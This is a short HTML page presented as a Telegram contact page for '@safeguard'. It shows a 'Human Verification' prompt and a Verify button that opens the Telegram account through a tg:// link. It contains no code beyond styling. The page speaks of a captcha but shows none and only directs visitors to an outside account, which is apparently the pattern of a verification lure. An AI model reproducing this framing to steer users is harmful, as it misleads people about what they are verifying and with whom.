<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Telegram: Contact @safeguard</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" sizes="32x32" href="//telegram.org/img/favicon-32x32.png">
    <style>
      body {
        margin: 0;
        font-family: Arial, sans-serif;
        background-color: #000;
        color: #fff;
        text-align: center;
        padding-top: 50px;
      }
      .container {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        gap: 15px;
      }
      .btn {
        background-color: #0088cc;
        color: white;
        text-decoration: none;
        padding: 10px 20px;
        border-radius: 5px;
        font-size: 16px;
        font-weight: bold;
      }
      .btn:hover {
        background-color: #006699;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <img src="https://cdn4.cdn-telegram.org/file/C-CZdhI3jurgsdXQUqzOTQTQixM_It9CNM0m4P2vuMCZ6kRXb7yPr_Z1PgOJspNypGbFvjsnosQpTW76zXjYH4tpFIXB2jJA6uCANxSf300xfcJMKK3dyA1iwZr8JAQIAbkiiFUAf-hsrwWzeirRkTe6OIvy9jSy2SnRmGewQJRKc6QWVj0ulZtYXmEr-iAutQfW_hmztOMi5OX_tOzWW7z-kuGtk8auV3qaVu_TkrxnkacOzWwnszsrtvZcsk-XxffP3syXDi8IVVoC2j_FW8ngxmeDRl96hB89BvwvXGsETZeEDSd7VvmTVOsBAu7fzQcIbZeXJf7JMqExaRfjSA.jpg" alt="Logo" width="150" height="150">
      <h1>Human Verification</h1>
      <p>Verify your user authenticity by completing the captcha below.</p>
      <p>Powered By: <strong>@Safeguard</strong></p>
      <a class="btn" href="tg://resolve?domain=safeguard">Verify</a>
      <p>If you have Telegram, you can contact Safeguard right away.</p>
    </div>
  </body>
</html>
